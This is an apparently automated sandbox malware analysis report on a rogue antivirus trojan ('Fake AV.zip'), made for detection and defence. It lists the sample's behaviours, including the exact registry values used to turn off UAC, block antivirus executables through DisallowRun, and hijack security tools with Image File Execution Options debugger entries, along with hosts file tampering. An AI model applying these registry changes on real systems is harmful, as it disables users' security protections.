Malware Analysis Report

2025-08-05 20:09

Sample ID 240302-2g86qsad96
Target Fake AV.zip
SHA256 aee69ef9040e902b7a6639d7594df47e0e73625143a671583db8b85be525a3e5
Tags
bootkit discovery evasion persistence spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aee69ef9040e902b7a6639d7594df47e0e73625143a671583db8b85be525a3e5

Threat Level: Known bad

The file Fake AV.zip was found to be: Known bad.

Malicious Activity Summary

bootkit discovery evasion persistence spyware stealer trojan upx

Modifies WinLogon for persistence

Windows security bypass

UAC bypass

Modifies security service

Checks for common network interception software

Enumerates VirtualBox registry keys

Drops file in Drivers directory

Sets service image path in registry

Blocks application from running via registry modification

Sets file execution options in registry

Disables RegEdit via registry modification

Adds policy Run key to start application

Loads dropped DLL

Modifies system executable filetype association

Unexpected DNS network traffic destination

Executes dropped EXE

UPX packed file

Checks BIOS information in registry

Checks computer location settings

Windows security modification

Deletes itself

Reads user/profile data of web browsers

Maps connected drives based on registry

Checks registry for disk virtualization

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Drops desktop.ini file(s)

Checks whether UAC is enabled

Enumerates connected drives

Checks for any installed AV software in registry

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

NSIS installer

Runs net.exe

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Runs ping.exe

System policy modification

Modifies Internet Explorer settings

Modifies Internet Explorer start page

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Views/modifies file attributes

Suspicious behavior: GetForegroundWindowSpam

Gathers network information

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Script User-Agent

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-03-02 22:34

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

146s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
File created C:\Windows\system32\drivers\etc\host_new C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\support.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gav.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[5].exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navwnt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pspf.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fameh32.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntrtscan.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsSvc.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\livesrv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxmonitor9x.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\espwatch.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\teekids.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OLT.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvc95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFSrv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icsuppnt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrp-421-en-win.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\realmon.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jdbgmrg.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrl-421-en-win.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drweb32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmain.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfpconfg.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav530wtbyb.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscan40.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveArmor.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\istsvc.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwupd32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htpatch.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sofi.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSACore.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icsupp95.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\portdetective.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procdump.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bundle.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sahagent.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vnpc3000.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guard.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUNMain.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iedriver.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupvameeval.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Virus Professional.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveArmor.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashQuick.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsgk32.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcfwallicon.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ray.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootconf.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfgwiz.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebProxy.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\escanv95.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxav.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxas.exe\Debugger = "svchost.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.222.222 N/A N/A
Destination IP 208.67.220.220 N/A N/A
